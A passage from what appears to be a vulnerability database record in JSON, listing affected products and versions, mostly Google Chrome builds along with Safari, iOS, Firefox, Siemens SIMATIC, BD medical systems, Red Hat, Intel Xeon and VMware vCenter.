      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1014"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.529.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.70"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.3.1"
      },
      {
        "_id": null,
        "model": "simatic ipc847d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.93"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.324"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.929.0"
      },
      {
        "_id": null,
        "model": "simatic ipc547g",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.510.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.3.1549"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.410.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.79"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.787.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.323"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.292.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.405.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.212.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.684.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.796.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.153.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.35"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.134.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.121"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1076.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.123"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1307.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.103"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.120"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.757.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.15"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.79"
      },
      {
        "_id": null,
        "model": "facscelesta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.20"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.5"
      },
      {
        "_id": null,
        "model": "enterprise linux for ibm z systems extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.55"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.3.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.249.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.31"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.45"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.118"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.97"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.120"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.40"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "50.0.2661.102"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.70"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.832.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1066.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.702.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.316"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.514.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1284.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.221.8"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "24.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.403.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.55"
      },
      {
        "_id": null,
        "model": "simatic field pg m5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "43.0.2357"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "33.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.72"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874102"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.304.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1018.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1278.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.229"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.572.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.146"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.139"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.22"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.60"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1282.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1057.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.88"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.2"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.303.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.100"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.3.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3"
      },
      {
        "_id": null,
        "model": "pyxis scrubstation system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.26"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "18.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.20"
      },
      {
        "_id": null,
        "model": "pyxis anesthesia system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "35000"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.436.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1030.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.44"
      },
      {
        "_id": null,
        "model": "xeon cpu e5-1650",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "v30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.340"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1689.2"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.889.2"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.1.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "5.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.343"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.531.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.679.0"
      },
      {
        "_id": null,
        "model": "veritor plus system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.103"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.57"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.300"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.893.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.644.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.5"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.173"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.70"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.570.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.17"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.313.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.351.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.887.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "30.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1288.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.36"
      },
      {
        "_id": null,
        "model": "content analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "2.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1498.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.793.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.71"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.151"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1301.0"
      },
      {
        "_id": null,
        "model": "facsvia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "pixel c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.205"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.29"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.8"
      },
      {
        "_id": null,
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.5"
      },
      {
        "_id": null,
